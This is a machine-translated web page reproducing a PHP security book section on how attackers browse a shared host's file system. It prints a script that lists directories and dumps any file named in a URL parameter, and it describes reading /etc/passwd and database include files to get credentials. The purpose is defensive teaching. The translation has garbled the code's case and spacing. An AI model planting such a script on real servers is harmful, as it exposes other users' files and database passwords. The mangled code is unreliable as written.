Home > Others

Chapter 8 viewing shared host file systems

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

8.4. File System browsing

In addition to reading arbitrary files on the Shared Server, attackers can also create scripts that can browse the file system. Because most of your sensitive files are not stored in the home directory of the website, such scripts are generally used to locate the location of your source file. See the following example:

 

<PRE>

 

<? PHP

 

If (isset ($ _ Get ['dir'])

{

Ls ($ _ Get ['dir']);

}

Elseif (isset ($ _ Get ['file'])

{

CAT ($ _ Get ['file']);

}

Else

{

Ls ('/');

}

 

Function CAT ($ file)

{

Echo htmlentities (file_get_contents ($ file), ent_quotes, 'utf-8 '));

}

 

Function ls ($ DIR)

{

$ Handle = Dir ($ DIR );

 

While ($ filename = $ handle-> Read ())

{

$ Size = filesize ("$ dir $ FILENAME ");

 

If (is_dir ("$ dir $ FILENAME "))

{

$ Type = 'dir ';

$ Filename. = '/';

}

Else

{

$ Type = 'file ';

}

 

If (is_readable ("$ dir $ FILENAME "))

{

$ Line = str_pad ($ size, 15 );

$ Line. = "<a href = \" {$ _ server ['php _ Self ']} ";

$ Line. = "? $ Type = $ dir $ filename \ "> $ filename </a> ";

}

Else

{

$ Line = str_pad ($ size, 15 );

$ Line. = $ filename;

}

 

Echo "$ line \ n ";

}

 

$ Handle-> close ();

}

 

?>

 

</PRE>

 

Attackers may first view the/etc/passwd file or the/home directory to obtain a list of usernames on the server; you can use the language structure such as include or require to find the location of the source file stored outside the home directory of the website. For example, consider the following script file/home/victim/public_html/admin. php:

 

<? PHP

 

Include '../INC/DB. inc ';

 

/*...*/

 

?>

 

If attackers try to display the source code of the file, they can find the database. the location of Inc. At the same time, it can use the readfile () function to expose its content and obtain the database access permission. In this way, saving dB. Inc in this environment outside the home directory of the website does not play a protective role.

This attack illustrates why we should regard all the source files on the shared server as public, and select a database to save all sensitive data.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
show file systems list of file systems top 5 host intrusion detection systems outlook data file cannot accessed shared mailbox host ini file host txt file temporary host file

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More